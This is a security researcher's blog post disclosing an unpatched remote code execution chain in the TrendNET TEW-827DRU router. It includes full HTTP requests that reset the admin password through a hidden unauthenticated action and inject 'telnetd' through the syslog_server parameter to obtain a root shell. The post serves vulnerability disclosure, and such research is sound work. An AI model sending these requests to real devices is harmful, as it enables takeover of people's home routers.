TrendNET AC2600 RCE via WAN

James Sebree
Tenable TechBlog
Published in
3 min readJan 31, 2022

This blog provides a walkthrough of how to gain RCE on the TrendNET AC2600 (model TEW-827DRU specifically) consumer router via the WAN interface. There is currently no publicly available patch for these issues; therefore only a subset of issues disclosed in TRA-2021–54 will be discussed in this post. For more details regarding other security-related issues in this device, please refer to the Tenable Research Advisory.

In order to achieve arbitrary execution on the device, three flaws need to be chained together: a firewall misconfiguration, a hidden administrative command, and a command injection vulnerability.

The first step in this chain involves finding one of the devices on the internet. Many remote router attacks require some sort of management interface to be manually enabled by the administrator of the device. Fortunately for us, this device has no such requirement. All of its services are exposed via the WAN interface by default. Unfortunately for us, however, they’re exposed only via IPv6. Due to an oversight in the default firewall rules for the device, there are no restrictions made to IPv6, which is enabled by default.

Once a device has been located, the next step is to gain administrative access. This involves compromising the admin account by utilizing a hidden administrative command, which is available without authentication. The “apply_sec.cgi” endpoint contains a hidden action called “tools_admin_elecom.” This action contains a variety of methods for managing the device. Using this hidden functionality, we are able to change the password of the admin account to something of our own choosing. The following request demonstrates changing the admin password to “testing123”:

POST /apply_sec.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 145
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/setup_wizard.asp
Cookie: compact_display_state=false
Upgrade-Insecure-Requests: 1
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=testing123

The third and final flaw we need to abuse is a command injection vulnerability in the syslog functionality of the device. If properly configured, which it is by default, syslogd spawns during boot. If a malformed parameter is supplied in the config file and the device is rebooted, syslogd will fail to start.

When visiting the syslog configuration page (adm_syslog.asp), the backend checks to see if syslogd is running. If not, an attempt is made to start it, which is done by a system() call that accepts user controllable input. This system() call runs input from the cameo.cameo.syslog_server parameter. We need to somehow stop the service, supply a command to be injected, and restart the service.

The exploit chain for this vulnerability is as follows:

  1. Send a request to corrupt syslog command file and change the cameo.cameo.syslog_server parameter to contain an injected command
  2. Reboot the device to stop the service (possible via the web interface or through a manual request)
  3. Visit the syslog config page to trigger system() call

The following request will both corrupt the configuration file and supply the necessary syslog_server parameter for injection. Telnetd was chosen as the command to inject.

POST /apply.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 363
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/adm_syslog.asp
Cookie: compact_display_state=false
ccp_act=set&html_response_return_page=adm_syslog.asp&action=tools_syslog&reboot_type=application&cameo.cameo.syslog_server=1%2F192.168.1.1:1234%3btelnetd%3b&cameo.log.enable=1&cameo.log.server=break_config&cameo.log.log_system_activity=1&cameo.log.log_attacks=1&cameo.log.log_notice=1&cameo.log.log_debug_information=1&1629923014463=1629923014463

Once we reboot the device and re-visit the syslog configuration page, we’ll be able to telnet into the device as root.

Since IPv6 raises the barrier of entry in discovering these devices, we don’t expect widespread exploitation. That said, it’s a pretty simple exploit chain that can be fully automated. Hopefully the vendor releases patches publicly soon.

--

--